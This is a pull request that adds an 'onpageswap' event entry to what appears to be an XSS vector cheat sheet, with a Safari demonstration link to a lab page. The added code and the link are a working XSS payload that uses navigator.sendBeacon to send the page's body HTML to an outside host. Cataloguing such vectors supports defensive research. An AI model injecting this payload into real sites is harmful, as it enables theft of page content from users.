### PR TITLE
Add onpageswap event - with user interaction

### DIFF
--- a/json/events.json
+++ b/json/events.json
@@ -6430,5 +6430,16 @@
         "interaction": false
       }
     ]
+  },
+  "onpageswap": {
+    "description": "Fires when the page reloads",
+    "tags": [
+      {
+        "tag": "body",
+        "code": "<body onpageswap=navigator.sendBeacon('//ssl.portswigger-labs.net/',document.body.innerHTML)>",
+        "browsers": ["safari"],
+        "interaction": true
+      }
+    ]
   }
 }


### PR DESCRIPTION
For a quick demonstration, use https://portswigger-labs.net/xss/xss.php?context=html&x=%3Cbody%20onpageswap%3D%22navigator.sendBeacon%28%27%2F%2Fssl.portswigger-labs.net%2F%27%2Cdocument.body.innerHTML%29%22%3E